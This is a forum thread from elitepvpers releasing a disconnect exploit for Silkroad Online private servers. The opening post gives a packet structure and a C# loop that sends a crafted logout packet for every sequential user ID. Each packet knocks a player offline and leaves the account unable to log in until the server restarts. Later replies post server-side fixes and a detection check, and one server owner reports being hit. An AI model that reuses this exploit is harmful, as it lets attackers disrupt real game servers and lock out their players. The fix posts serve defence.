Register for your free account! | Forgot your password?

Go Back   elitepvpers > Popular Games > Silkroad Online > SRO Private Server > SRO PServer Guides & Releases
You last visited: Today at 06:37

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



[Release] Disconnect players exploit found by IWA

Discussion on [Release] Disconnect players exploit found by IWA within the SRO PServer Guides & Releases forum part of the SRO Private Server category.

Reply
 
Old   #1
 
elite*gold: 0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,371
[Release] Disconnect players exploit found by IWA

Hello,

How it works:
  • Inject packet in char screen.
  • Shard will send response to agent and DC the UserJID.
  • Must be sent at char screen or it wont work.
  • People cannot login again until files are restarted, bugs the account.

Packet structure:
Code:
0x7005
uint UserJID
byte 4
Example exploit structure:
Code:
Server->Client
if(_pck.Opcode == 0xB007) // server opcode
{
    if(_pck.ReadUInt8() == 2)
    {
        UInt32 jid = 0;
        while (true)
        {
            Packet test = new Packet(0x7005);
            test.WriteUInt32(jid);
            test.WriteUInt8(0x04);
            m_RemoteSecurity.Send(test); // Send to server
            jid++;
            Thread.Sleep(50);
            Console.WriteLine($"UserJID: {jid} fakubic");
        }
    }
}
Download exploit:


​Goofie​ is offline  
Thanks
20 Users
Old 01/31/2017, 10:01   #2
 
Yui..'s Avatar
 
elite*gold: 1
Join Date: Jan 2008
Posts: 187
Received Thanks: 25
nice one
Yui.. is offline  
Old 01/31/2017, 11:27   #3
 
elite*gold: 36
Join Date: Mar 2010
Posts: 558
Received Thanks: 224
try again
Laag#82 is offline  
Old 01/31/2017, 11:35   #4
 
first_master's Avatar
 
elite*gold: 0
Join Date: Apr 2014
Posts: 25
Received Thanks: 8
fix

Code:
if(_pck.Opcode == 0xB007) // server opcode 
{ 
if(_pck.ReadUInt8() == 2) 
{ 
return false; 
} 
}
first_master is offline  
Thanks
3 Users
Old 01/31/2017, 11:52   #5
 
elite*gold: 0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,371
Quote:
Originally Posted by first_master View Post
Fix

Quote:
if(_pck.Opcode == 0xB007) // server opcode
{
if(_pck.ReadUInt8() == 2)
{
return false;
}
}
Yes please do that.
​Goofie​ is offline  
Old 01/31/2017, 11:57   #6
 
elite*gold: 26
Join Date: May 2008
Posts: 574
Received Thanks: 437
Quote:
Originally Posted by first_master View Post
Fix
Yes this is the fix. Good, well done!
Wismo is offline  
Old 01/31/2017, 13:34   #7
 
kanift's Avatar
 
elite*gold: 0
Join Date: May 2010
Posts: 62
Received Thanks: 78
nvm.
kanift is offline  
Old 01/31/2017, 16:33   #8


 
MeGaMaX's Avatar
 
elite*gold: 1537
Join Date: Sep 2006
Posts: 1,085
Received Thanks: 2,345
These files are so doomed...
MeGaMaX is offline  
Thanks
1 User
Old 01/31/2017, 23:07   #9
 
elite*gold: 0
Join Date: Feb 2008
Posts: 961
Received Thanks: 648
Quote:
Originally Posted by first_master View Post
Fix
What the ****? are you incapable of reading 3 lines of code?
magicanoo is offline  
Thanks
2 Users
Old 01/31/2017, 23:28   #10
 
ramy_11_1's Avatar
 
elite*gold: 0
Join Date: Feb 2013
Posts: 65
Received Thanks: 37
Another fix method :

Code:
#region Logout - Restart Packet
if (packet.Opcode == 0x7005)
{
	// DC Exploit Check!
	if (string.IsNullOrEmpty(Charname))
	{
		Methods.AddLog("Character list packet exploit detected, Disconnect..", Color.Red);
		this.Disconnect();
		continue;
	}

	// Double Check!
	if (bytes.Length > 1)
	{
		Methods.AddLog("Character list packet exploit detected, Disconnect..", Color.Red);
		this.Disconnect();
		continue;
	}

	int type = packet.ReadInt8();

	// here we go!
	// logout delay or any *****
}
#endregion
ramy_11_1 is offline  
Thanks
2 Users
Old 02/01/2017, 03:25   #11
 
elite*gold: 0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,371
Quote:
Originally Posted by MeGaMaX. View Post
These files are so doomed...
Release vSRO 188 source already
​Goofie​ is offline  
Thanks
2 Users
Old 02/03/2017, 12:35   #12
 
denise456's Avatar
 
elite*gold: 0
Join Date: Jan 2011
Posts: 373
Received Thanks: 71
pls help my GameServer all time dc all not loged help


On playing user is trying to enter lobby!!. [JID: 325]

On playing user is trying to enter lobby!!. [JID: 325]

On playing user is trying to enter lobby!!. [JID: 322]
denise456 is offline  
Old 02/03/2017, 16:48   #13
 
DeusZeke's Avatar
 
elite*gold: 0
Join Date: Aug 2015
Posts: 161
Received Thanks: 128
I clicked "How to use for dumb people" FeelsBadMan
DeusZeke is offline  
Thanks
2 Users
Old 02/04/2017, 00:30   #14
 
ILowe's Avatar
 
elite*gold: 0
Join Date: Mar 2012
Posts: 677
Received Thanks: 29
How is it working? bro
ILowe is offline  
Old 02/04/2017, 13:36   #15
 
ramy_11_1's Avatar
 
elite*gold: 0
Join Date: Feb 2013
Posts: 65
Received Thanks: 37
Quote:
Originally Posted by ILowe View Post
How is it working? bro
he said already!

Quote:
Originally Posted by ​Goofie​ View Post

How it works:
  • Inject packet in char screen.
  • Shard will send response to agent and DC the UserJID.
  • Must be sent at char screen or it wont work.
  • People cannot login again until files are restarted, bugs the account.
ramy_11_1 is offline  
Reply


Similar Threads Similar Threads
NEW HACK DISCONNECT PLAYERS FOR EGY ?
08/03/2015 - Conquer Online 2 - 15 Replies
They know something that disconnects the other players only with the person giving you whisper? this has been going on online 2.0 recentemento conquers, if they become aware of something let me know please. Thanks!
Disconnect Players
05/21/2012 - S4 League - 3 Replies
There was this person named Flooow8 who could disconnect every player in the round. If you know how please show me.
Disconnect other players
01/06/2007 - WoW Exploits, Hacks, Tools & Macros - 20 Replies
1) get an empty mug from the table 2) fill it 3) get an empty mug from the table 4) fill it you should now have 2 filled mugs trade a person, i prefer noobs as they will always accept put in some cash in the trade window, and 2x a filled mug when you both hit accept, he will get a disconnect and you keep the money Why?



All times are GMT +1. The time now is 06:37.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.